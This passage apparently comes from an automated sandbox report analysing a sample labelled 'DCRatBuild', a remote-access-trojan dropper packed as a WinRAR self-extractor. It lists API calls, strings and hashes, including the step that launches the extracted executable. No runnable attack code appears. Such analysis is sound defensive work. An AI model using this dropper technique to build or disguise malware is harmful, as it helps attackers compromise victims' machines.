f09dfb SetFileTime 23951->23736 23952->23951 23953->23659 23954->23662 
                                      [Control-flow graph edge data for the analysed functions (basic-block addresses in the 00F0xxxx range with their API-call annotations, e.g. FindFirstFileW, OpenFileMappingW, MapViewOfFile, DialogBoxParamW, ShellExecuteExW); the rendered graph is not reproducible as text.]

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00F100CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00F100E4
                                        • Part of subcall function 00F100CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F100F6
                                        • Part of subcall function 00F100CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F10127
                                        • Part of subcall function 00F19DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00F19DAC
                                        • Part of subcall function 00F1A335: OleInitialize.OLE32(00000000), ref: 00F1A34E
                                        • Part of subcall function 00F1A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F1A385
                                        • Part of subcall function 00F1A335: SHGetMalloc.SHELL32(00F48430), ref: 00F1A38F
                                        • Part of subcall function 00F113B3: GetCPInfo.KERNEL32(00000000,?), ref: 00F113C4
                                        • Part of subcall function 00F113B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00F113D8
                                      • GetCommandLineW.KERNEL32 ref: 00F1D61C
                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00F1D643
                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00F1D654
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00F1D68E
                                        • Part of subcall function 00F1D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00F1D29D
                                        • Part of subcall function 00F1D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F1D2D9
                                      • CloseHandle.KERNEL32(00000000), ref: 00F1D697
                                      • GetModuleFileNameW.KERNEL32(00000000,00F5DC90,00000800), ref: 00F1D6B2
                                      • SetEnvironmentVariableW.KERNEL32(sfxname,00F5DC90), ref: 00F1D6BE
                                      • GetLocalTime.KERNEL32(?), ref: 00F1D6C9
                                      • _swprintf.LIBCMT ref: 00F1D708
                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00F1D71A
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00F1D721
                                      • LoadIconW.USER32(00000000,00000064), ref: 00F1D738
                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00F1D789
                                      • Sleep.KERNEL32(?), ref: 00F1D7B7
                                      • DeleteObject.GDI32 ref: 00F1D7F0
                                      • DeleteObject.GDI32(?), ref: 00F1D800
                                      • CloseHandle.KERNEL32 ref: 00F1D843
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                      • API String ID: 788466649-2079648372
                                      • Opcode ID: bbedeae86f9acb35b5ec83bd83a6b367c4912fc59e8c7279b72509be3cbf8f92
                                      • Instruction ID: 114399863a4e1c88d201f17a21c3a40fe21436bb4ef5b70ae6d0d62b608823a6
                                      • Opcode Fuzzy Hash: bbedeae86f9acb35b5ec83bd83a6b367c4912fc59e8c7279b72509be3cbf8f92
                                      • Instruction Fuzzy Hash: 8461F471900349AFD320EFA5EC49BAB37A8AB45765F000428F945D31A2DFB8D984F762

                                      Control-flow Graph (graph image omitted)
                                      APIs
                                      • FindResourceW.KERNEL32(00F1AE4D,PNG,?,?,?,00F1AE4D,00000066), ref: 00F19E2E
                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00F1AE4D,00000066), ref: 00F19E46
                                      • LoadResource.KERNEL32(00000000,?,?,?,00F1AE4D,00000066), ref: 00F19E59
                                      • LockResource.KERNEL32(00000000,?,?,?,00F1AE4D,00000066), ref: 00F19E64
                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00F1AE4D,00000066), ref: 00F19E82
                                      • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00F1AE4D,00000066), ref: 00F19E93
                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00F19EFC
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00F19F1B
                                      • GlobalFree.KERNEL32(00000000), ref: 00F19F22
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                      • String ID: PNG
                                      • API String ID: 4097654274-364855578
                                      • Opcode ID: 98f25d6891fa3d4ead3704fceaab53b8144e8f034cd52d8f65cfa13baf48a297
                                      • Instruction ID: 52d6bc2f071382d3249a29b90f105e3805631a4dc4b5982a394d3061b09ca9ae
                                      • Opcode Fuzzy Hash: 98f25d6891fa3d4ead3704fceaab53b8144e8f034cd52d8f65cfa13baf48a297
                                      • Instruction Fuzzy Hash: D0318175A0830AABC7109F21EC5895BBBAAFF85771B040528F906D3260DBB5DC41ABA1

                                      Control-flow Graph (graph image omitted)
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00F0A4EF,000000FF,?,?), ref: 00F0A628
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00F0A4EF,000000FF,?,?), ref: 00F0A65E
                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00F0A4EF,000000FF,?,?), ref: 00F0A66A
                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,00F0A4EF,000000FF,?,?), ref: 00F0A692
                                      • GetLastError.KERNEL32(?,?,?,?,00F0A4EF,000000FF,?,?), ref: 00F0A69E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: FileFind$ErrorFirstLast$Next
                                      • String ID:
                                      • API String ID: 869497890-0
                                      • Opcode ID: 5e6ec898f9a5610fcfd8779f4e911a073143673126cf727036439dc3e20406f0
                                      • Instruction ID: 3e5572a5a53b6134d029ee3206ce4f74a028004bdb3c15fca141d95eeff54dab
                                      • Opcode Fuzzy Hash: 5e6ec898f9a5610fcfd8779f4e911a073143673126cf727036439dc3e20406f0
                                      • Instruction Fuzzy Hash: 82419372504345AFC724EF68C884ADAF7F8FF48354F040A2AF5D9D3240D775A994AB92
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,?,00F27513,00000000,00F3BAD8,0000000C,00F2766A,00000000,00000002,00000000), ref: 00F2755E
                                      • TerminateProcess.KERNEL32(00000000,?,00F27513,00000000,00F3BAD8,0000000C,00F2766A,00000000,00000002,00000000), ref: 00F27565
                                      • ExitProcess.KERNEL32 ref: 00F27577
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: f23ce053c999cc082b7d102dac21c67a29a649cdc6e508d569c3aac76be89357
                                      • Instruction ID: ba3976ad52a76acf349c541a43104b7b93b259d6c3eee60f3e3678b012fca717
                                      • Opcode Fuzzy Hash: f23ce053c999cc082b7d102dac21c67a29a649cdc6e508d569c3aac76be89357
                                      • Instruction Fuzzy Hash: 93E0EC31404A58EFCF11FF64ED0AA4A7F6AEF40765F148414F9058A232CB39DE42EB50
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog_memcmp
                                      • String ID:
                                      • API String ID: 3004599000-0
                                      • Opcode ID: 8c1d77c2f7ea80a223e2da100cda5ca2c4db1f2c24288a9cde44a3c6d9a3bf51
                                      • Instruction ID: d6f3f456eece3cdeb66aed8020a6dcc5b5f2722349b061c8aef94a3a74adbe81
                                      • Opcode Fuzzy Hash: 8c1d77c2f7ea80a223e2da100cda5ca2c4db1f2c24288a9cde44a3c6d9a3bf51
                                      • Instruction Fuzzy Hash: 0E823A70D04245AEDF25DB70C881BFABBA9AF05350F0841B9DC999B1C3DB745A4AFB60
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F1AEE5
                                        • Part of subcall function 00F0130B: GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
                                        • Part of subcall function 00F0130B: SetWindowTextW.USER32(00000000,00F335B4), ref: 00F01365
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prologItemTextWindow
                                      • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                      • API String ID: 810644672-3344487560
                                      • Opcode ID: 7cd337466fd58e257416e6cdb4b5971cd26db56301137b9210b2cc4fc1c81dd8
                                      • Instruction ID: f55f5f0454e8865ad6ca4c5c8a599bf4a50d2817666cc541c2057bf455368b34
                                      • Opcode Fuzzy Hash: 7cd337466fd58e257416e6cdb4b5971cd26db56301137b9210b2cc4fc1c81dd8
                                      • Instruction Fuzzy Hash: 8242E671D44258FEEB21EBA09C8AFEE7B7CAB12751F000054F601A61E1CBB94985FB61

                                      Control-flow Graph (graph image omitted)
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32), ref: 00F100E4
                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F100F6
                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F10127
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F103D4
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F103F0
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F10402
                                      • ReadFile.KERNEL32(00000000,?,00007FFE,00F33BA4,00000000), ref: 00F10421
                                      • CloseHandle.KERNEL32(00000000), ref: 00F10479
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F1048F
                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00F104E7
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00F10510
                                      • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00F1054A
                                        • Part of subcall function 00F10085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F100A0
                                        • Part of subcall function 00F10085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0EB86,Crypt32.dll,00000000,00F0EC0A,?,?,00F0EBEC,?,?,?), ref: 00F100C2
                                      • _swprintf.LIBCMT ref: 00F105BE
                                      • _swprintf.LIBCMT ref: 00F1060A
                                        • Part of subcall function 00F0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F0401D
                                      • AllocConsole.KERNEL32 ref: 00F10612
                                      • GetCurrentProcessId.KERNEL32 ref: 00F1061C
                                      • AttachConsole.KERNEL32(00000000), ref: 00F10623
                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00F10649
                                      • WriteConsoleW.KERNEL32(00000000), ref: 00F10650
                                      • Sleep.KERNEL32(00002710), ref: 00F1065B
                                      • FreeConsole.KERNEL32 ref: 00F10661
                                      • ExitProcess.KERNEL32 ref: 00F10669
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                      • API String ID: 1201351596-3298887752
                                      • Opcode ID: 8893180b2166dd09caffb0ba2fd1e06502f24370eed192ca1d6b42d21c876a15
                                      • Instruction ID: 3dee5d5334a22a33c1015fae0b261ba228396550efae44b8dfdc71f56887f3c0
                                      • Opcode Fuzzy Hash: 8893180b2166dd09caffb0ba2fd1e06502f24370eed192ca1d6b42d21c876a15
                                      • Instruction Fuzzy Hash: C3D190B1508384ABD334DF60DC49BDFBBE9BB84724F40091DF68996151CBB49688AF63

                                      Control-flow Graph (graph image omitted)
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F1BDFA
                                        • Part of subcall function 00F1AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00F1AAFE
                                      • SetWindowTextW.USER32(?,?), ref: 00F1C127
                                      • _wcsrchr.LIBVCRUNTIME ref: 00F1C2B1
                                      • GetDlgItem.USER32(?,00000066), ref: 00F1C2EC
                                      • SetWindowTextW.USER32(00000000,?), ref: 00F1C2FC
                                      • SendMessageW.USER32(00000000,00000143,00000000,00F4A472), ref: 00F1C30A
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F1C335
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                      • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                      • API String ID: 3564274579-312220925
                                      • Opcode ID: 3e37c2a9062a9dd550a83e14a909f75bf85c6aa4e978175b6cfdd71c4794d21a
                                      • Instruction ID: 223692e740c15776c2416e8af51dfb08bc15bbc1a94215ed48ebc990e4d80d69
                                      • Opcode Fuzzy Hash: 3e37c2a9062a9dd550a83e14a909f75bf85c6aa4e978175b6cfdd71c4794d21a
                                      • Instruction Fuzzy Hash: DDE19472D44629AADB25DBA0DC55DEF777CAF09311F0041A6F609E3090EB789BC4AF90

                                      Control-flow Graph (graph image omitted)
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F0D346
                                      • _wcschr.LIBVCRUNTIME ref: 00F0D367
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00F0D328,?), ref: 00F0D382
                                      • __fprintf_l.LIBCMT ref: 00F0D873
                                        • Part of subcall function 00F1137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F0B652,00000000,?,?,?,00010414), ref: 00F11396
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                      • API String ID: 4184910265-980926923
                                      • Opcode ID: 01cbaef20f9a47887861fd6924cbc9f9a124d841209d3d80e3597c52d3fd26de
                                      • Instruction ID: caae66742454a78b3472286638212465b5ea9a1837d145f83a73fbde57a0660a
                                      • Opcode Fuzzy Hash: 01cbaef20f9a47887861fd6924cbc9f9a124d841209d3d80e3597c52d3fd26de
                                      • Instruction Fuzzy Hash: FB12B0B1E002199ADF24DFE4DC82BEEB7B5EF04720F14456AE505A71C2EB749A44FB24

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00F1AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1AC85
                                        • Part of subcall function 00F1AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1AC96
                                        • Part of subcall function 00F1AC74: IsDialogMessageW.USER32(00010414,?), ref: 00F1ACAA
                                        • Part of subcall function 00F1AC74: TranslateMessage.USER32(?), ref: 00F1ACB8
                                        • Part of subcall function 00F1AC74: DispatchMessageW.USER32(?), ref: 00F1ACC2
                                      • GetDlgItem.USER32(00000068,00F5ECB0), ref: 00F1CB6E
                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00F1A632,00000001,?,?,00F1AECB,00F34F88,00F5ECB0), ref: 00F1CB96
                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F1CBA1
                                      • SendMessageW.USER32(00000000,000000C2,00000000,00F335B4), ref: 00F1CBAF
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F1CBC5
                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00F1CBDF
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F1CC23
                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00F1CC31
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F1CC40
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F1CC67
                                      • SendMessageW.USER32(00000000,000000C2,00000000,00F3431C), ref: 00F1CC76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                      • String ID: \
                                      • API String ID: 3569833718-2967466578
                                      • Opcode ID: 8ff7540d2c65a3d5f574d602c286b6720d5064a71f80fb5f6bb988a0b5860446
                                      • Instruction ID: bf386eb4ec51f9467d13d840d764992168fa97ddbf76467eae3559660e7a4ab5
                                      • Opcode Fuzzy Hash: 8ff7540d2c65a3d5f574d602c286b6720d5064a71f80fb5f6bb988a0b5860446
                                      • Instruction Fuzzy Hash: 5031C471189749BBD301DF209C4AFAF7FACEB42754F000508FA61971E1D7A45A05E7B6

                                      Control-flow Graph

control_flow_graph: function entry at f1ce22 (rendered basic-block graph with executed/not-executed marking; edge list not reproduced in text)
                                      APIs
                                      • ShellExecuteExW.SHELL32(?), ref: 00F1CF54
                                      • ShowWindow.USER32(?,00000000), ref: 00F1CF93
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00F1CFCF
                                      • CloseHandle.KERNEL32(?), ref: 00F1CFF5
                                      • ShowWindow.USER32(?,00000001), ref: 00F1D084
                                        • Part of subcall function 00F117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F0BB05,00000000,.exe,?,?,00000800,?,?,00F185DF,?), ref: 00F117C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                      • String ID: $.exe$.inf
                                      • API String ID: 3686203788-2452507128
                                      • Opcode ID: 69b2fe6a6c73271f160c65345b4f9ba5675e53c12adedbbdb1e6c66ac994edb0
                                      • Instruction ID: e52151031e0a6f60872e002a3a98c97afb46d1fddb754714a11680b9d7a119ff
                                      • Opcode Fuzzy Hash: 69b2fe6a6c73271f160c65345b4f9ba5675e53c12adedbbdb1e6c66ac994edb0
                                      • Instruction Fuzzy Hash: 95610271848384AADB319F20D8046EBBBF9AF86320F04481DF5C097255D7B5D9C6FBA2

                                      Control-flow Graph

control_flow_graph: function entry at f2a058 (rendered basic-block graph with executed/not-executed marking; edge list not reproduced in text)
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F24E35,00F24E35,?,?,?,00F2A2A9,00000001,00000001,3FE85006), ref: 00F2A0B2
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F2A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00F2A138
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F2A232
                                      • __freea.LIBCMT ref: 00F2A23F
                                        • Part of subcall function 00F28518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2C13D,00000000,?,00F267E2,?,00000008,?,00F289AD,?,?,?), ref: 00F2854A
                                      • __freea.LIBCMT ref: 00F2A248
                                      • __freea.LIBCMT ref: 00F2A26D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
